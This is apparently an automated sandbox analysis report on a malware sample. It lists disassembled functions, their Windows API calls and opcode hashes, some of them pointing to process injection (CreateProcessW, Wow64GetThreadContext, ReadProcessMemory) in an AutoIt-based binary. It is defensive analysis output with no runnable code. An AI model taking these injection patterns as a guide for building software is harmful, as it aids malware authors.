                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                        • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                                                        • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                        • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                                                        Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                        • __lock_file.LIBCMT ref: 004253EB
                                                                                          • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                                                        • __fclose_nolock.LIBCMT ref: 004253F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                        • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                                                        • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                        • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                                                                        Function 00AC5D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AC5D6D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 4171955f1963030196a187f3431418744cf2c98bb7d73cef8bc9512bd16f46fe
                                                                                        • Instruction ID: d76f06a4fb41ee74ba11ba5ff23debc44ffea70c96c8d04eb5a5948955ec241d
                                                                                        • Opcode Fuzzy Hash: 4171955f1963030196a187f3431418744cf2c98bb7d73cef8bc9512bd16f46fe
                                                                                        • Instruction Fuzzy Hash: 08F09655D04F00A6DD3FC378DD4DF752A605B22729F4F484DB243190F289513CC5C102
                                                                                        Function 00D6E4ED Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 00D6ECAB
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D6ED41
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00D6ED63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                        • Instruction ID: 3f62441cfca8c612d8b2b9c01cd392dcd6fc6a640e144fb0f6e3fde0d417e7a1
                                                                                        • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                        • Instruction Fuzzy Hash: F112CD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                        Function 00AC5F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bd25bed8f27988a623bc339674af6a2df1a6f15b9a2df7eab4c2c44e9ca6fb85
                                                                                        • Instruction ID: d726c50fbfd6378c8bd7d4a79e33fbb426512610367caf49745af8e7e070afcd
                                                                                        • Opcode Fuzzy Hash: bd25bed8f27988a623bc339674af6a2df1a6f15b9a2df7eab4c2c44e9ca6fb85
                                                                                        • Instruction Fuzzy Hash: 0071B431D0DB809EC73AC7388414F76BBA06B66360F4F869DF0959B1A2D671BDC49392
                                                                                        Function 00AC6490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 29e9f33e7875e0977126e5d9d9b2d016fd38b6f6527e7dca255716f6789d0561
                                                                                        • Instruction ID: 2f207b79d29aab3aaddd09a80233761d4b774dff659ea09c964e6b939f277424
                                                                                        • Opcode Fuzzy Hash: 29e9f33e7875e0977126e5d9d9b2d016fd38b6f6527e7dca255716f6789d0561
                                                                                        • Instruction Fuzzy Hash: F731D670D0C3409ACB39CB28C648F75BBB06FA1710F4F865EE0859B2E2D6759C44D792
                                                                                        Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                                                        Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                        • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                                                        • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                        • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                                                        Function 00407B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
                                                                                        • Instruction ID: e277250e627d10e0330490a348a3b32a96e3d7cb5ffc8e96ca57e5c84c001af0
                                                                                        • Opcode Fuzzy Hash: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
                                                                                        • Instruction Fuzzy Hash: 86210072A14A19EBDB108F26E84176E7BB4FB18354F21853FE886C51D0EB38E490D74E
                                                                                        Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                                                          • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                          • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                                                          • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1396898556-0
                                                                                        • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                        • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                                                        • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                        • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                                                        Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                        • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                                                        • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                        • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                                                        Function 00AC6086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: 9f3907f8e0caeb2ff5e9c544b51eed748004f416b5d75b072e5dc59894678f90
                                                                                        • Instruction ID: 189b99d5bf7d43d2d7f0b36fac52ba2a41e644ef48ee8b821c7d370c449e8bbc
                                                                                        • Opcode Fuzzy Hash: 9f3907f8e0caeb2ff5e9c544b51eed748004f416b5d75b072e5dc59894678f90
                                                                                        • Instruction Fuzzy Hash: AC018071C0D3409EC725CB348404F767BB46F56361F0F8A9EA085AB1A2D6309C44C792
                                                                                        Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 004248A6
                                                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2597487223-0
                                                                                        • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                        • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                                                        • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                        • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                                                        Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                        • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                                                        • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                        • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                                                                        Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2514874351-0
                                                                                        • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                        • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                                                        • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                        • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                                                        Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wfsopen
                                                                                        • String ID:
                                                                                        • API String ID: 197181222-0
                                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                        • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                        • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                                                                        Function 00D6F4EC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                        • Instruction ID: 63e5b6d9108fa14038292ea4450d49857e5bd4777462d135cbd59780b0037cb8
                                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                        • Instruction Fuzzy Hash: 8EE09A7494010DAFDB00EFA8E5496DE7BB4EF04301F1005A1FD05D6681DB319E548A62
                                                                                        Function 00D6F4F0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction ID: ce4d4bd37124397d420fb275253cd16eda1ea06c10a96b3ea9048cf262c37e3f
                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction Fuzzy Hash: 3EE0BF7494010D9FDB00EFB8D54969E7BB4EF04301F100161FD01D2281D6319E508A62

                                                                                        Non-executed Functions

                                                                                        Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                                                        • SendMessageW.USER32 ref: 0048CC29
                                                                                        • _wcsncpy.LIBCMT ref: 0048CC95
                                                                                        • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                                                        • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                                                        • GetKeyState.USER32(00000010), ref: 0048CCE3
